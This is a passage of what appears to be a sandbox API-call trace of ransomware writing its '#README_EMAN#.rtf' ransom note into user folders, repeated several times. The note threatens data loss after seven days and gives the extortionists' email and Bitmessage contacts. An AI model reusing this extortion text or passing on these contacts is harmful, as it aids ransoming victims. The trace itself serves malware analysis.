br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.220] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.221] CloseHandle (hObject=0x294) returned 1 [0278.221] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0278.221] GetLastError () returned 0x2 [0278.221] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur 